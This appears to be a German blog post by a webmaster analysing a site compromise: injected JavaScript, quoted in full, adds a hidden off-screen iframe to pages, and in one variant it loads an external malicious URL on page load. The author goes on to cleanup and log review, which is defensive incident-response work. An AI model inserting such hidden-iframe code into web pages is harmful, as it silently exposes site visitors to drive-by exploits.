Ein seltsames Javascript wollte laufen, welches daraufhin ein Java-Applet ausführen wollte (aja, danke NoScript!).... Die Sicherheitslücke in Java, welche die letzten Tage durch die Medien ging, scheint wohl wirklich gerne genutzt zu werden...
Nach näherem Betrachten habe ich folgendes festgestellt:
In fast jeder html und auch php-Datei wurde automatisiert JS-Code reingeschrieben, welcher einen iFrame erzeugt, allerdings ohne src. Böse JS-Datein machten das gleiche, nur diesmal inkl. Bösartiger src-Seite.
PHP:
#82f26d#
echo "<script type=\"text/javascript\">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = \"-\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
</script>
";
#/82f26d#
<!--82f26d--><script type="text/javascript">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "-";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
</script><!--/82f26d-->
/*82f26d*/
function frmAdd() {
return false;
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://www.bamflor.com/pannelli/system.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
/*/82f26d*/
Netterweise hat der Schadcode immer das gleiche Beginn/End-Kommentar, war also relativ leicht ihn zu finden und zu entfernen. Wer ein Script dafür braucht, schreibs ins Kommentar.
Nach ein bisschen recherche im Netz findet man weitere befallene Seiten. Allerdings variiert das charakteristische Kommentar und auch die frame-src.
Jetzt bleibt noch die Frage: "Wie sind die hier reingekommen?"
Da die infizierten Seiten tatsächlich nur im home-Ordner waren, der FTP-Acc zu mehr Zugang hat und auch am Server mehrere HPs liegen, ist es naheliegend, dass sie bösartigen PHP-Code zum ausführen brachten.
Also mal schauen, wann die Seiten modifiziert wurden und dann ein Blick in die Logs.
Aber nach was suchen?
Und hier habe ich etwas gefunden:
Hackattemptidentifier
Rein via JavaScript werden die kopierten Log-Zeilen analysiert und kategorisiert.
In meinen Logs wurden auch einige Versuche gefunden, habe diese auch nachgestellt, allerdings sind die leider ins leere gelaufen...
Leider kann ich etwaige POST-Attacken nicht identifizieren, das POST standartmäßig von Apache nicht mitgeloggt werden.
Sollte euch noch einfallen, wie man weiter nach der Lücke im System suchen kann, bitte schreiben!
No comments:
Post a Comment